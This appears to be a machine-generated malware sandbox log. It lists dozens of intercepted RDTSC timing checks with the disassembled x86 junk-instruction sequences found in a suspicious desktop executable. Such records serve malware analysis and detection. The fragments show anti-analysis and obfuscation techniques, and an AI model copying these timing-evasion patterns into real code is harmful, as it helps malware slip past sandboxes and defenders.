Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC5867 second address: FC5881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC854E second address: FC8552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD712B second address: FD7137 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F8E2D690EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD7137 second address: FD7150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD7150 second address: FD7161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD907D second address: FD908E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F8E2D68FC56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD8EC7 second address: FD8EDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8E2D690EEAh 0x00000008 jnc 00007F8E2D690EE6h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD8EDE second address: FD8F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 jmp 00007F8E2D68FC5Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8E2D68FC58h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDB422 second address: FDB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDB428 second address: FDB42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDD78A second address: FDD790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE3B9E second address: FE3BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE25F5 second address: FE2616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF3h 0x00000007 jp 00007F8E2D690EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE2616 second address: FE262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE2F4B second address: FE2F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE747A second address: FE7491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8E2D68FC62h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE7491 second address: FE74AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74AF second address: FE74B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74B3 second address: FE74B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74B7 second address: FE74BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAAC1 second address: FEAB00 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E2D690F05h 0x00000008 jnl 00007F8E2D690EE6h 0x0000000e jmp 00007F8E2D690EF9h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8E2D690EF0h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB00 second address: FEAB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB04 second address: FEAB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F8E2D690EEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB1D second address: FEAB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEACAD second address: FEACB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEACB7 second address: FEACE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8E2D68FC66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102A820 second address: 102A83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F8E2D690EE6h 0x0000000d jmp 00007F8E2D690EF0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102CDC2 second address: 102CDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8E2D68FC60h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F8E2D68FC64h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102E3DD second address: 102E404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EEEh 0x00000009 popad 0x0000000a jno 00007F8E2D690EF4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102E404 second address: 102E415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1024BCF second address: 1024BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BD94 second address: 103BDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jo 00007F8E2D68FC56h 0x00000011 jl 00007F8E2D68FC56h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDB2 second address: 103BDBC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDBC second address: 103BDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDC2 second address: 103BDD1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E2D690EE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDD1 second address: 103BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BEE7 second address: 103BF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007F8E2D690EE6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BF09 second address: 103BF19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E2D68FC56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11003F3 second address: 1100402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100402 second address: 1100406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100406 second address: 110042A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F8E2D690EEAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E2D690EF2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100863 second address: 1100867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100867 second address: 11008C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEBh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F8E2D690EF4h 0x00000016 jmp 00007F8E2D690EEFh 0x0000001b pushad 0x0000001c jmp 00007F8E2D690EF6h 0x00000021 jmp 00007F8E2D690EEAh 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100A42 second address: 1100A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 jmp 00007F8E2D68FC5Fh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100DBA second address: 1100DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEDh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100EE4 second address: 1100EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F8E2D68FC56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100EF7 second address: 1100F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F8E2D690EEEh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100F0D second address: 1100F28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E2D68FC65h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100F28 second address: 1100F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029A6 second address: 11029AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029AB second address: 11029B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029B7 second address: 11029C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E2D68FC56h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029C2 second address: 11029C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029C8 second address: 11029CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029CE second address: 11029D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106B8B second address: 1106BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106BA5 second address: 1106BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8E2D690EF3h 0x0000000f nop 0x00000010 mov edx, dword ptr [ebp+122D1BE1h] 0x00000016 push 00000004h 0x00000018 mov edx, 61E5ED7Fh 0x0000001d call 00007F8E2D690EE9h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8E2D690EEDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106BF7 second address: 1106C09 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E2D68FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8E2D68FC56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C09 second address: 1106C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C0D second address: 1106C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F8E2D68FC58h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jng 00007F8E2D68FC6Ch 0x0000001c jmp 00007F8E2D68FC66h 0x00000021 mov eax, dword ptr [eax] 0x00000023 jbe 00007F8E2D68FC64h 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F8E2D68FC56h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C4F second address: 1106C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F8E2D690EF2h 0x00000010 jbe 00007F8E2D690EECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB148C second address: 6DB1490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1490 second address: 6DB1522 instructions: 0x00000000 rdtsc 0x00000002 mov ax, DA33h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F8E2D690EF8h 0x0000000e sbb cl, 00000038h 0x00000011 jmp 00007F8E2D690EEBh 0x00000016 popfd 0x00000017 popad 0x00000018 or dword ptr [edx+38h], FFFFFFFFh 0x0000001c pushad 0x0000001d mov di, si 0x00000020 mov bh, ch 0x00000022 popad 0x00000023 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8E2D690EF4h 0x00000030 sub al, FFFFFFC8h 0x00000033 jmp 00007F8E2D690EEBh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F8E2D690EF8h 0x0000003f adc ax, B628h 0x00000044 jmp 00007F8E2D690EEBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1522 second address: 6DB153A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB153A second address: 6DB1559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 mov dx, 4282h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00BFF second address: 6E00C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00C05 second address: 6E00C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E2D690EF4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F8E2D690EF0h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F8E2D690EF0h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov dl, 9Ch 0x00000023 jmp 00007F8E2D690EF6h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0855 second address: 6DA085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA085B second address: 6DA085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA085F second address: 6DA0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0863 second address: 6DA08AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F8E2D690EEAh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 call 00007F8E2D690EEEh 0x00000018 mov ecx, 0F8DDB91h 0x0000001d pop ecx 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F8E2D690EF5h 0x00000028 mov bx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40729 second address: 6D4072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D4072F second address: 6D40733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B17 second address: 6D40B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8E2D68FC66h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 50h 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B46 second address: 6D40B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B4B second address: 6D40B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8E2D68FC68h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8E2D68FC67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AAF second address: 6D90AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AC2 second address: 6D90AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AE7 second address: 6D90AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AEB second address: 6D90AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70058 second address: 6D7005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7005E second address: 6D70062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70062 second address: 6D70082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E2D690EF5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70082 second address: 6D700A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 75244E00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E2D68FC61h 0x00000017 rdtsc
